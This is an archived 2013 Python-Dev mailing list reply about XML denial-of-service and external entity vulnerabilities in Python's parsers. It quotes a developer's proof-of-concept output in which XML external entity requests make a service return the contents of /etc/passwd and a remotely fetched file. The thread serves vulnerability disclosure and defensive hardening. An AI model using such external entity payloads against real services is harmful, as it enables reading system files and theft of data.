[Python-Dev] XML DoS vulnerabilities and exploits in Python (original) (raw)
M.-A. Lemburg mal at egenix.com
Sun Feb 24 12:56:33 CET 2013
- Previous message: [Python-Dev] XML DoS vulnerabilities and exploits in Python
- Next message: [Python-Dev] XML DoS vulnerabilities and exploits in Python
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Reminds me of the encoding attacks that were possible in earlier versions of Python... you could have e.g. an email processing script run the Python test suite by simply sending a specially crafted email :-)
On 21.02.2013 13:04, Christian Heimes wrote: > Am 21.02.2013 11:32, schrieb Antoine Pitrou: >> You haven't proved that these were actual threats, nor how they >> actually worked. I'm gonna remain skeptical if there isn't anything >> more precise than "It highly depends on the parser and the application >> what kind of exploit is possible". >> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default >> $ ./python-external.py >> REQUEST: > -------- > Aachen >> RESPONSE: > --------- > _The weather in Aachen is terrible.>> REQUEST: > -------- > > _ > ]> > &passwd; >>> RESPONSE: > --------- > Unknown city root:x:0:0:root:/root:/bin/bash > daemon:x:1:1:daemon:/usr/sbin:/bin/sh > bin:x:2:2:bin:/bin:/bin/sh > sys:x:3:3:sys:/dev:/bin/sh > sync:x:4:65534:sync:/bin:/bin/sync > games:x:5:60:games:/usr/games:/bin/sh > man:x:6:12:man:/var/cache/man:/bin/sh > lp:x:7:7:lp:/var/spool/lpd:/bin/sh > mail:x:8:8:mail:/var/mail:/bin/sh > news:x:9:9:news:/var/spool/news:/bin/sh > uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh > proxy:x:13:13:proxy:/bin:/bin/sh > www-data:x:33:33:www-data:/var/www:/bin/sh > backup:x:34:34:backup:/var/backups:/bi >>> REQUEST: > -------- > > _ _ "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem"> > ]> > &url; >>> RESPONSE: > --------- > Unknown city -----BEGIN DH PARAMETERS----- > MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak > XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC > -----END DH PARAMETERS----- >> These are the 512 bit DH parameters from "Assigned Number for SKIP > Protocols" > (http://www.skip-vpn.org/spec/numbers.html). > See there for how they were generated. > Note that g is not a generator, but this is not a problem since p is a > safe prime. > >>> Q.E.D. > Christian > _________________________ > Python-Dev mailing list > Python-Dev at python.org > http://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: http://mail.python.org/mailman/options/python-dev/mal%40egenix.com >
Marc-Andre Lemburg eGenix.com
Professional Python Services directly from the Source (#1, Feb 24 2013)
Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/
::::: Try our mxODBC.Connect Python Database Interface for free ! ::::::
eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/
- Previous message: [Python-Dev] XML DoS vulnerabilities and exploits in Python
- Next message: [Python-Dev] XML DoS vulnerabilities and exploits in Python
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]